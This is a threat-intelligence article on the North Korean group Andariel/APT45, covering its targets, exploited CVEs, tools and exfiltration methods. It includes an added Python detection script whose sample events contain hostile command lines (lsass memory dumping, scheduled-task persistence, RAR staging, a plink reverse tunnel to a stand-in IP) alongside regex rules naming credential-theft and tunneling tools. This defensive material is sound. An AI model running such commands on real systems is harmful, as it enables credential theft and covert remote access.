Andariel Threat Group Exploits Multiple CVEs to Compromise Global Industries
North Korean threat actor Andariel, also known as APT45, Onyx Sleet, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa, has been identified as conducting cyber espionage on behalf of the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Mandiant have each reported on the group’s operations, which are run from Pyongyang and Sinuiju. Andariel targets a wide range of business verticals, including agriculture, aerospace, biotechnology, chemical, construction, defense, education, energy, engineering, entertainment, financial, healthcare, insurance, legal, manufacturing, nuclear, pharmaceutical, retail, technology, telecommunications, transportation, and utilities. The primary objective of these operations is to obtain sensitive and classified technical information to advance the regime’s military and nuclear programs.
CISA's findings outline a range of sensitive information targeted across several industries, including defense, aerospace, nuclear, and engineering. In the defense sector, the group focuses on data related to tanks, combat vehicles, and naval vessels, as well as modeling and simulation services. In aerospace, its interests lie in fighter jets, UAVs, missile systems, satellites, and various radar technologies. For the nuclear industry, it seeks information on uranium processing, waste management, nuclear power plants, and government research facilities. In engineering, Andariel targets shipbuilding, robotics, 3D printing technologies, and various manufacturing processes. "The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs," as reported by CISA.
Ransomware is also used to generate funds for these operations, particularly when deployed against healthcare entities located in the United States; reporting from CISA and Mandiant links Maui ransomware to North Korean state-sponsored actors. Andariel gains initial access by exploiting known vulnerabilities, researching published CVEs such as CVE-2021-44228 (Apache Log4j), CVE-2022-22965 (Spring4Shell), CVE-2022-30190 (Microsoft Windows Support Diagnostic Tool), CVE-2023-34362 (MOVEit), and CVE-2023-3519 (Citrix NetScaler). Once access is obtained, the actors conduct system discovery and enumeration, establish persistence using Scheduled Tasks, and dump credentials using tools like Mimikatz. They deploy custom malware implants, remote access tools (RATs), and open-source tools for execution, lateral movement, and data exfiltration. Common tools used by Andariel include Python, Mimikatz, AdFind, PLINK, ProcDump, and WinSCP, alongside native commands such as netstat, curl, systeminfo, and findstr. Living-off-the-land techniques rely on PowerShell, Windows Command Shell, Visual Basic, and Scheduled Tasks. To facilitate lateral movement, Andariel utilizes Remote Desktop Protocol (RDP), SMB/Windows Admin Shares, and SSH.
The group also leverages custom malware and remote access tools (RATs) to maintain its foothold and exfiltrate data. Custom tools such as AndarLoader, NukeSped, MagicRAT, TigerRAT, and Valefor/VSingle give Andariel the capability to execute arbitrary commands, log keystrokes, take screenshots, list files, and capture network connections, allowing it to monitor and control compromised systems effectively. Data exfiltration is typically conducted by packaging data into RAR archives, which are then transferred to remote servers using tools like PuTTY and WinSCP. The actors also utilize cloud storage services to exfiltrate data, further complicating detection and attribution efforts.
Andariel's command and control infrastructure utilizes techniques like tunneling through 3Proxy, PLINK, and Stunnel to evade detection and maintain connectivity with compromised systems. This allows them to conduct operations despite network defenses like Network Address Translation (NAT) and web proxies. The actors conduct operations with a high degree of adaptability, frequently changing tactics to maintain access and evade detection, utilizing web shells for persistent access. Defense evasion is achieved through advanced packing techniques using VMProtect and Themida, leveraging living-off-the-land techniques, and by employing legitimate tools in ways that blend malicious actions with normal system operations.
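The discovery bursts, Scheduled Task persistence, credential dumping, RAR staging, WinSCP/PuTTY transfers and PLINK/3Proxy/Stunnel tunneling described in the preceding three paragraphs all surface in ordinary process-creation telemetry, which makes them practical detection hooks. The script below is an added example and is not code from the original article, CISA, or Mandiant; the event schema, hostnames, parent PIDs, file paths, and the 203.0.113.10 address are constructed for illustration. It applies per-event signature rules for each stage and a stateful rule that only fires when several distinct discovery commands run under the same parent process, so a single `systeminfo` on an unrelated host does not alert.

```python
"""Added example (not from the original article): a small detection pass over
constructed Windows process-creation events that flags the Andariel tradecraft
the article lists. Event fields and all sample values are constructed."""
import re
from collections import defaultdict

# Constructed process-creation events: host, parent PID, image name, command line.
SAMPLE_EVENTS = [
    {"host": "ws01", "ppid": 4100, "image": "cmd.exe",      "cmdline": "cmd.exe /c systeminfo"},
    {"host": "ws01", "ppid": 4100, "image": "cmd.exe",      "cmdline": "cmd.exe /c netstat -ano"},
    {"host": "ws01", "ppid": 4100, "image": "cmd.exe",      "cmdline": "cmd.exe /c findstr /i version build.txt"},
    {"host": "ws01", "ppid": 4100, "image": "schtasks.exe", "cmdline": "schtasks /create /tn Update /tr c:\\users\\public\\svc.exe /sc onlogon"},
    {"host": "ws01", "ppid": 4100, "image": "procdump.exe", "cmdline": "procdump.exe -ma lsass.exe lsass.dmp"},
    {"host": "ws01", "ppid": 4100, "image": "rar.exe",      "cmdline": "rar.exe a -r c:\\users\\public\\out.rar d:\\projects\\"},
    {"host": "ws01", "ppid": 4100, "image": "winscp.exe",   "cmdline": "winscp.exe /console /script=up.txt"},
    {"host": "ws01", "ppid": 4100, "image": "plink.exe",    "cmdline": "plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10"},
    # Benign-looking host: one discovery command alone should not alert.
    {"host": "ws02", "ppid": 880,  "image": "cmd.exe",      "cmdline": "cmd.exe /c systeminfo"},
]

# Stateless rules: one regex per stage the article describes.
RULES = [
    ("persistence_scheduled_task", re.compile(r"schtasks(\.exe)?\s+/create", re.I)),
    ("credential_dumping",         re.compile(r"mimikatz|sekurlsa|procdump.*lsass", re.I)),
    ("archive_staging",            re.compile(r"\brar(\.exe)?\s+a\b", re.I)),
    ("exfil_client",               re.compile(r"\b(winscp|pscp|psftp|putty)(\.exe)?\b", re.I)),
    ("tunneling_tool",             re.compile(r"\bplink(\.exe)?\b.*\s-[RL]\b|\b3proxy\b|\bstunnel\b", re.I)),
]

# Stateful rule: distinct discovery commands under one parent process.
DISCOVERY = re.compile(r"\b(netstat|systeminfo|findstr|whoami|ipconfig|tasklist)\b", re.I)
DISCOVERY_THRESHOLD = 3


def detect(events):
    """Return a list of findings, each {"host", "rule", "cmdline"}."""
    findings = []
    discovery = defaultdict(set)  # (host, ppid) -> distinct discovery commands seen
    for ev in events:
        cl = ev["cmdline"]
        for name, pattern in RULES:
            if pattern.search(cl):
                findings.append({"host": ev["host"], "rule": name, "cmdline": cl})
        m = DISCOVERY.search(cl)
        if m:
            discovery[(ev["host"], ev["ppid"])].add(m.group(1).lower())
    for (host, ppid), cmds in discovery.items():
        if len(cmds) >= DISCOVERY_THRESHOLD:
            findings.append({
                "host": host,
                "rule": "discovery_burst",
                "cmdline": ", ".join(sorted(cmds)) + f" (parent pid {ppid})",
            })
    return findings


def rules_by_host(findings):
    """Collapse findings to host -> sorted list of distinct rule names.

    A host hitting several stages (discovery, persistence, dumping, staging,
    exfil, tunneling) is far more interesting than any single hit."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f["host"]].add(f["rule"])
    return {host: sorted(rules) for host, rules in per_host.items()}


if __name__ == "__main__":
    results = detect(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f['host']}] {f['rule']}: {f['cmdline']}")
    for host, rules in rules_by_host(results).items():
        print(f"{host}: {len(rules)} stages matched -> {rules}")
```

Running it against the constructed events flags six distinct stages on ws01 and nothing on ws02. In production the regexes would be tuned to the environment (PuTTY and WinSCP are legitimate on many admin workstations), and the per-parent discovery counter would be bounded by a time window rather than the whole event stream.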
To mitigate the threats posed by Andariel, it is crucial for organizations to apply patches for known vulnerabilities promptly, monitor suspicious activities on endpoints, and implement strong authentication and remote access controls. Continuous monitoring and threat intelligence are essential to stay ahead of such advanced threat actors, as they persistently adapt their strategies to exploit emerging vulnerabilities and maintain a foothold in targeted networks. Mandiant warns, "As the country has become reliant on its cyber operations as an instrument of national power, the operations carried out by APT45 and other North Korean cyber operators may reflect the changing priorities of the country’s leadership."